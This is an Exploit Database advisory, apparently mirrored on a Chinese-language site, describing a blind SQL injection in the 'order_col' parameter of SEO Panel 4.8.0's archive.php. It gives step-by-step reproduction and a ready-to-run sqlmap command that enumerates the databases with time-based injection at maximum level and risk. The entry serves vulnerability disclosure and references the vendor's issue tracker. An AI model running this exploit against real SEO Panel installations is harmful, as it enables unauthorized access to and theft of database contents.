SEO Panel 4.8.0 – ‘order_col’ Blind SQL Injection (1)

• Exploit Database
• 21 阅读

• 作者： Piyush Patil
  日期： 2021-03-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49666/

• # Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (1)
  # Date: 17/02/2021
  # Exploit Author: Piyush Patil
  # Vendor Homepage: https://www.seopanel.org/
  # Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
  # Version: 4.8.0
  
  
  # Reference - https://github.com/seopanel/Seo-Panel/issues/209
  
  Step 1 - Login to the SEO Panel with admin credentials.
  Step 2 - Go to archive.php
  Step 3 - Change "order_col" value to "*" and copy the request
  Command: sqlmap -r request.txt --batch --level 5 --risk 3 --dbms MYSQL
  --dbs --technique=T --flush-session